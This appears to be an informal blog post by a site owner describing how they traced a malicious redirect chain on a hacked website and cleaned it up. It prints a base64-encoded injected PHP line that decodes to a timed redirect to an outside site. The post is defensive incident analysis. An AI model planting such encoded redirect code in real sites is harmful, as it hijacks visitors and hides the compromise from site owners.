took a while to locate the issue – what was the issue. It was not javascrpt as I first disabled that and the redirect still happened.

Said site was redirecting to a few sites (I am guessing this quickly masks the initial site and helps them run the hack longer by obfuscation a bit.)
Anyway they have hacked a few sites and so I was getting a chain reaction happening…

One of the site files had the following line hacked into it..


this is a dodgy line !

so to not eval it and see what really is under the decoding do the following

echo base64_decode(‘aGVhZGVyKCJSZWZyZXNoOiAyNTsgdXJsPVwiaHR0cDovL3d3dy5kb2RvbmV0LmJpei91cy9cIiIpOw==’);

and we get

header(“Refresh: 25; url=\”\””);

so just enter this in your browser and see the chain of redirects I was getting

they are linking then through a script at arizona uni

and sometimes redirects through a different site

, a script is sitting on the arizona university site site – I have emailed them but they may ignore it as a strange email. the second site seems less pro. Still both need alerting to this – the aite analytics should show quite a bit of traffic on their domain.

so deleting this base 64 line will fix the hack, this issue was caused by poor file security and someone was able to write this line to this file.
In the same site was a couple of other files one a jpeg – here

and the other another actual file susu.php that probably links to this image – then googling comes up with a lot of other similar attacks – so in this way we are able to do what the hacker does to us find out more info given a little to start out with

those sites also got the treatment. I hope this helps others out there. Check the facebook link above and wonder at how insecure the internet is is facebook isnt able to do much about it.